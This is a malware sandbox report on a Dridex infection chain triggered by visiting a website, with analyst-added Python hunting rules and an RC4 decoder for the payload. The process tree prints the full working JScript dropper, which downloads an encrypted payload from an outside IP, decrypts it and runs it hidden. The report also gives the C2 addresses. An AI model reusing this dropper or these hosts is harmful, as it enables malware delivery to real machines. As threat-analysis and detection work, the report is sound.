Analysis
max time kernel: 134s
max time network: 141s
platform: windows10_x64
resource: win10v20210410
submitted: 02-06-2021 08:33
Static task: static1
URLScan task: urlscan1
Sample: http://magickpeoplenew.xyz/
General
Malware Config
Extracted family: dridex
Botnet: 10111
C2:
  162.214.106.107:13783
  46.231.204.10:8172
Signatures
Yara rule match 2 IoCs
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\zmseu.exe | cryptone
  C:\Users\Admin\AppData\Local\Temp\zmseu.exe | cryptone
Blocklisted process makes network request 1 IoCs
Processes:
  flow | pid | process
  28 | 3588 | wscript.exe

Executes dropped EXE 1 IoCs
Processes:
  pid | process
  4168 | zmseu.exe
Checks whether UAC is enabled 1 IoCs
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | zmseu.exe
Modifies Internet Explorer settings 40 IoCs
These are the browser's own housekeeping writes (FlipAhead, DomainSuggestion, VersionManager, Recovery) triggered by loading the page; they are attributed to iexplore.exe, not to the dropped payload.
Processes:
  All keys below are under \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\
  description | ioc | process
  Set value (int) | DomainSuggestion\NextUpdateDate = "329388027" | iexplore.exe
  Set value (data) | FlipAhead\Meta\generator$WordPress | iexplore.exe
  Set value (int) | FlipAhead\FileVersion = "2016061511" | iexplore.exe
  Set value (int) | Main\CompatibilityFlags = "0" | iexplore.exe
  Set value (str) | Main\FullScreen = "no" | iexplore.exe
  Key created | Recovery\PendingRecovery | iexplore.exe
  Key created | DomainSuggestion\FileNames\ | iexplore.exe
  Set value (data) | FlipAhead\Meta\generator$blogger | iexplore.exe
  Set value (int) | FlipAhead\NextUpdateDate = "329436613" | iexplore.exe
  Key created | Main\WindowsSearch | iexplore.exe
  Set value (str) | Main\WindowsSearch\Version = "WS not running" | iexplore.exe
  Key created | VersionManager | iexplore.exe
  Set value (str) | DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
  Set value (data) | FlipAhead\Meta\generator$Discuz! | iexplore.exe
  Set value (data) | FlipAhead\Meta\generator$Telligent | iexplore.exe
  Key created | HistoryJournalCertificate | iexplore.exe
  Set value (int) | VersionManager\LastTTLLowDateTime = "1251635200" | iexplore.exe
  Set value (int) | VersionManager\LastCheckForUpdateHighDateTime = "30889866" | iexplore.exe
  Set value (int) | VersionManager\LastCheckForUpdateHighDateTime = "30889866" | IEXPLORE.EXE
  Key created | DomainSuggestion | iexplore.exe
  Set value (data) | FlipAhead\Meta\generator$MediaWiki | iexplore.exe
  Key created | Main | iexplore.exe
  Set value (int) | Recovery\AdminActive\{C59B924F-C37D-11EB-A11C-7E556571BED2} = "0" | iexplore.exe
  Key created | VersionManager | IEXPLORE.EXE
  Set value (int) | VersionManager\LastCheckForUpdateLowDateTime = "2600291866" | IEXPLORE.EXE
  Set value (int) | HistoryJournalCertificate\NextUpdateDate = "329404621" | iexplore.exe
  Key created | Main | IEXPLORE.EXE
  Set value (int) | VersionManager\LastUpdateLowDateTime = "2590917258" | iexplore.exe
  Set value (int) | VersionManager\LastUpdateHighDateTime = "30889866" | iexplore.exe
  Key created | FlipAhead | iexplore.exe
  Set value (data) | Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
  Set value (int) | VersionManager\LastCheckForUpdateLowDateTime = "2591072987" | iexplore.exe
  Set value (data) | FlipAhead\Meta\generator$http://www.typepad.com/ | iexplore.exe
  Key created | FlipAhead\Meta | iexplore.exe
  Set value (data) | FlipAhead\Meta\generator$vBulletin 3 | iexplore.exe
  Set value (data) | FlipAhead\Meta\generator$vBulletin 4 | iexplore.exe
  Key created | Recovery\AdminActive | iexplore.exe
  Set value (int) | Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
  Set value (int) | VersionManager\LastTTLHighDateTime = "50" | iexplore.exe
  Key created | DomainSuggestion\FileNames | iexplore.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
  pid | process
  2208 | iexplore.exe

Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
  pid | process
  2208 | iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
  pid | process
  2208 | iexplore.exe (2 hooks)
  1796 | IEXPLORE.EXE (4 hooks)

Suspicious use of WriteProcessMemory 15 IoCs
Processes (each parent wrote to its child three times):
  pid | process | target pid | target process
  2208 | iexplore.exe | 1796 | IEXPLORE.EXE
  1796 | IEXPLORE.EXE | 1388 | cmd.exe
  1388 | cmd.exe | 3588 | wscript.exe
  3588 | wscript.exe | 4124 | cmd.exe
  4124 | cmd.exe | 4168 | zmseu.exe
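The WriteProcessMemory rows are the parent/child chain of this infection: browser tab, then cmd.exe writing an echo-built JScript to %TEMP%, then wscript.exe started with //E:JScript on a file that is not a script by extension, then cmd.exe running the dropped executable from %TEMP%. The hunting logic below is an added example and not part of the sandbox report; the events are constructed in the shape of Sysmon Event ID 1 fields from this report's process tree, with the two long command lines shortened and the URL abbreviated.

```python
"""Hunting logic for the chain in the WriteProcessMemory rows:
browser -> cmd.exe (echo ... >3.tMp && start wscript //B //E:JScript)
-> wscript.exe -> cmd.exe -> dropped executable in %TEMP%.
Added example; EVENTS are constructed from this report's process tree
(Sysmon Event ID 1 shape), with command lines shortened."""
import re

EVENTS = [
    {"pid": 2208, "ppid": 0,
     "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmd": '"C:\\Program Files\\Internet Explorer\\iexplore.exe" http://magickpeoplenew.xyz/'},
    {"pid": 1796, "ppid": 2208,
     "image": r"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE",
     "cmd": '"C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE" SCODEF:2208 CREDAT:82945 /prefetch:2'},
    {"pid": 1388, "ppid": 1796,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     # script body abbreviated to "{...}"; the real one is the JScript in the report
     "cmd": 'cmd.exe /q /c cd /d "%tmp%" && echo function O(l){...};>3.tMp && '
            'stArt wsCripT //B //E:JScript 3.tMp "hj4ZytE5dZgd" "http://31.44.3.115/?..." "2"'},
    {"pid": 3588, "ppid": 1388,
     "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmd": 'wsCripT //B //E:JScript 3.tMp "hj4ZytE5dZgd" "http://31.44.3.115/?..." "2"'},
    {"pid": 4124, "ppid": 3588,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": '"C:\\Windows\\System32\\cmd.exe" /c zmseu.exe'},
    {"pid": 4168, "ppid": 4124,
     "image": r"C:\Users\Admin\AppData\Local\Temp\zmseu.exe",
     "cmd": "zmseu.exe"},
]

BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh")
# //E:<engine> forces a script engine regardless of the file extension
ENGINE_OVERRIDE = re.compile(r"/+e:(jscript|vbscript)\b", re.I)
# script body produced by echo, redirected into a file, then started
ECHO_TO_FILE = re.compile(r"\becho\b.*>\s*\S+\s*&&\s*start\s+wscript", re.I | re.S)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image basenames from `pid` up to the root, following ppid links."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def script_path(cmdline):
    """First argument of a wscript/cscript command line that is not a //switch."""
    args = [a for a in cmdline.split()[1:] if not a.startswith("//")]
    return args[0] if args else ""


def evaluate(events):
    """Return (pid, rule) findings; each rule covers one link of the chain, so a
    partial match (for example only a browser-spawned shell) still surfaces."""
    findings = []
    for e in events:
        name = basename(e["image"])
        parents = ancestry(events, e["ppid"])
        if name == "wscript.exe" and ENGINE_OVERRIDE.search(e["cmd"]):
            if not script_path(e["cmd"]).lower().endswith(SCRIPT_EXT):
                findings.append((e["pid"], "wscript engine override on non-script extension"))
        if name == "cmd.exe" and ECHO_TO_FILE.search(e["cmd"]):
            findings.append((e["pid"], "script written via echo redirection then started"))
        if TEMP_DIR.search(e["image"]) and "wscript.exe" in parents[:2]:
            findings.append((e["pid"], "executable in Temp launched under wscript.exe"))
        if name in ("cmd.exe", "wscript.exe") and any(p in BROWSERS for p in parents):
            findings.append((e["pid"], "shell/script host descended from a browser"))
    return findings


if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(pid, rule)
```

Each rule is deliberately narrow so it can be lifted into a SIEM query on its own; the engine-override and echo-redirection checks fire on the command lines alone, while the Temp-executable and browser-ancestry checks need the parent chain, which is why the events carry ppid.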
Processes
1. C:\Program Files\Internet Explorer\iexplore.exe (PID 2208)
   "C:\Program Files\Internet Explorer\iexplore.exe" http://magickpeoplenew.xyz/
   - Modifies Internet Explorer settings
   - Suspicious behavior: GetForegroundWindowSpam
   - Suspicious use of FindShellTrayWindow
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 1796, parent 2208)
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2208 CREDAT:82945 /prefetch:2
      - Modifies Internet Explorer settings
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\cmd.exe (PID 1388, parent 1796)
         cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hj4ZytE5dZgd" "http://31.44.3.115/?MTQ5MDI5&MsTvB&s2ht4=2fn7DVHpqmeCij07eeEALwsF6WTh7S6vB-Lu1Tfwe0jiqEOQE4n9leTF5T8_GqzkLlzRaYg5SA_kCOYgkX_MeRE7Uz3A_xm7JAc5okwBKH7WlTxe4fVlsT4AlAn6nPQqKfrkBzAkY1UgTKLJoioh7BBiPYNT5whvSLRGZ22-rN8sc&oa1n4=x33QcvWfaRuPCYjEM__dSqRGPkvVHliPxo&zvUMeXRuqMzE5MA==" "2"
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\SysWOW64\wscript.exe (PID 3588, parent 1388)
            wsCripT //B //E:JScript 3.tMp "hj4ZytE5dZgd" "http://31.44.3.115/?MTQ5MDI5&MsTvB&s2ht4=2fn7DVHpqmeCij07eeEALwsF6WTh7S6vB-Lu1Tfwe0jiqEOQE4n9leTF5T8_GqzkLlzRaYg5SA_kCOYgkX_MeRE7Uz3A_xm7JAc5okwBKH7WlTxe4fVlsT4AlAn6nPQqKfrkBzAkY1UgTKLJoioh7BBiPYNT5whvSLRGZ22-rN8sc&oa1n4=x33QcvWfaRuPCYjEM__dSqRGPkvVHliPxo&zvUMeXRuqMzE5MA==" "2"
            - Blocklisted process makes network request
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\SysWOW64\cmd.exe (PID 4124, parent 3588)
               "C:\Windows\System32\cmd.exe" /c zmseu.exe
               - Suspicious use of WriteProcessMemory
               6. C:\Users\Admin\AppData\Local\Temp\zmseu.exe (PID 4168, parent 4124)
                  zmseu.exe
                  - Executes dropped EXE
                  - Checks whether UAC is enabled
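Reading the echo'd JScript in the cmd.exe node (PID 1388): it creates WinHttp.WinHttpRequest.5.1, sets option 0 (the user-agent string) to the third argument, so the download goes out with User-Agent "2", fetches the URL in the second argument (retrying once on error), RC4-decrypts the response body with the first argument "hj4ZytE5dZgd" as key (the `_` function is a plain RC4 KSA and PRGA over ISO-8859-1 code points), writes the result through ADODB.Stream to a random five-character name in %TEMP%, reads the byte 23 positions after the "PE\0\0" signature (octal 027), and launches either "cmd.exe /c regsvr32.exe /s <name>.dll" or "cmd.exe /c <name>.exe" with a hidden window before deleting its own script file (3.tMp). In this run the byte was below 32, so the .exe branch produced the "cmd.exe /c zmseu.exe" node. The following Python is an added example, not the dropper's code, that reproduces the decryption and the launch decision so a captured response body can be decoded offline; the PE header it decrypts is constructed for the demo and is not the real zmseu.exe.

```python
"""Python re-implementation (added example, not the dropper's own JScript) of
the payload handling in 3.tMp: RC4-decrypt the HTTP body with the first script
argument as key, then read the PE Characteristics high byte to choose between
the regsvr32 (DLL) and direct (EXE) launch. The PE header used for the demo is
constructed here and is not the real zmseu.exe."""
import struct

IMAGE_FILE_DLL = 0x2000


def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4 (KSA + PRGA). The dropper's `_` function is exactly this,
    run over ISO-8859-1 code points, so it maps byte-for-byte to the raw body."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def dropper_launch(payload: bytes, name: str) -> str:
    """Mirror `d=v.charCodeAt(027+v.indexOf("PE\\x00\\x00"))`: 027 is octal 23,
    the high byte of IMAGE_FILE_HEADER.Characteristics. `31<d` is true whenever
    that byte is >= 0x20, which is the IMAGE_FILE_DLL bit (0x2000); a payload
    with only the 0x4000/0x8000 flags set would also be treated as a DLL."""
    off = payload.find(b"PE\x00\x00")
    if off < 0 or off + 24 > len(payload):
        raise ValueError("decrypted body carries no PE signature (wrong key or an HTML error page)")
    characteristics_hi = payload[off + 23]
    if characteristics_hi > 31:
        return f"cmd.exe /c regsvr32.exe /s {name}.dll"
    return f"cmd.exe /c {name}.exe"


def analyse_response(key: str, body: bytes, name: str) -> str:
    """Analyst entry point: decrypt a captured body with the script's first
    argument ("hj4ZytE5dZgd" in this run) and report the launch it would make."""
    return dropper_launch(rc4(key.encode("latin-1"), body), name)


def build_fake_pe(characteristics: int) -> bytes:
    """Constructed minimal PE image for the demo: MZ stub whose e_lfanew points
    at a PE signature and a COFF header carrying `characteristics`."""
    e_lfanew = 0x40
    mz = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x014C, 3, 0, 0, 0, 0xE0, characteristics)
    return mz + b"PE\x00\x00" + coff + b"\x00" * 16


if __name__ == "__main__":
    key = "hj4ZytE5dZgd"
    for flags in (0x0102, 0x2102):
        body = rc4(key.encode("latin-1"), build_fake_pe(flags))  # what the server would send
        print(hex(flags), "->", analyse_response(key, body, "zmseu"))
```

To use it on a real capture, feed `analyse_response` the raw bytes of the HTTP response from 31.44.3.115 and the first script argument; because RC4 is symmetric the same routine also re-encrypts, which is how the demo builds its sample body.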
Downloads
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  MD5: 71d7a044701948ca4e59aa37f5d94260
  SHA1: 4952051481ef52d8fa5eb95b7832729dfc5e0bb4
  SHA256: bb7642da343e083585a1b00d995039544037747c542eb7937726692f9c388dfa
  SHA512: 16bb691baa401ac3c5b7424a0bf2248cc1226839960cbe6bf484fc898f4c06a85226181386ecb83064c5bb36de9b099f24294ea044bed3176b67fb0298f5159f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  MD5: eb4e278cf28565d97c25d1b4943d6171
  SHA1: 54054fd6e9e9340d8484b775e03a44ea7a300d74
  SHA256: 11ffd302a3cb7d9a6e759770b46f85b190babb2445ab5482ad97781cac12b400
  SHA512: 37ae2d925c7a0a49e3041c263199e9ec58a240070dd313bcbb69d60469d3628f18437f64e0dcc660b159b3b9bd11703c2f78101189b75fdfea491ecba5ee093d

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\317KXRBC.cookie
  MD5: 5ebcfad97f1996029771479b350f18cc
  SHA1: 28a121674ae2f4d592432b4051ff66eb294f970c
  SHA256: 8ca05547931b118d68d4ef049182efe841856cc042519bdfb2265254382ea04a
  SHA512: da899d8e36e0897d4f69b4c76e0cb3fccc6585bbd25c68cab5c6f58d355da717a3194b151b3095aa9e0846d66875de8dfa76eb163040cfd506d4da8e6e01a7ea

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\42CKLL15.cookie
  MD5: 94a941e5277e6ef89c5ff5169d8c004a
  SHA1: a3fc34a2de2e4012431cd19ddcecb56791ae1c72
  SHA256: 05d2a1a1dd487dba84c828b39eccb31953257475c5975457d077181a187e1347
  SHA512: 91642d285c74e742df124206e4331663560860beb60b86d58150eb9222be66058ba7673088464154c1b9368353cf42363c8578cc94bb304158a80a74454ad41c

C:\Users\Admin\AppData\Local\Temp\3.tMp
  MD5: 60fc00422b399db85f87d41b8328976d
  SHA1: bb85034acad8025f97e5bb236443debaf8926e4b
  SHA256: c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
  SHA512: 16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

C:\Users\Admin\AppData\Local\Temp\zmseu.exe (listed twice in the report, identical hashes)
  MD5: 88cdcb149db6ecf35adbdeecb8dcdf35
  SHA1: 45445ad72c0ca8c9e1fb5a9c068d0c185f481030
  SHA256: 6a534ae6677f311c1ccc3e0f590ab0b18d50cadce8f662ed3befb67f2efe7ad9
  SHA512: 4dbdec7b254e4a17c3518a1cba0356223ac3116871e626e522320eb87d2233119e3ea5f9f50a9ea462f53f7ab2e229a13e651e98b74a1030ae50e1e262568896
Memory dumps
memory/1388-116-0x0000000000000000-mapping.dmp
memory/1796-115-0x0000000000000000-mapping.dmp
memory/2208-114-0x00007FF834CA0000-0x00007FF834D0B000-memory.dmp (Filesize 428KB)
memory/3588-117-0x0000000000000000-mapping.dmp
memory/4124-119-0x0000000000000000-mapping.dmp
memory/4168-120-0x0000000000000000-mapping.dmp
memory/4168-124-0x0000000000400000-0x0000000000550000-memory.dmp (Filesize 1.3MB)
memory/4168-123-0x0000000000550000-0x000000000069A000-memory.dmp (Filesize 1.3MB)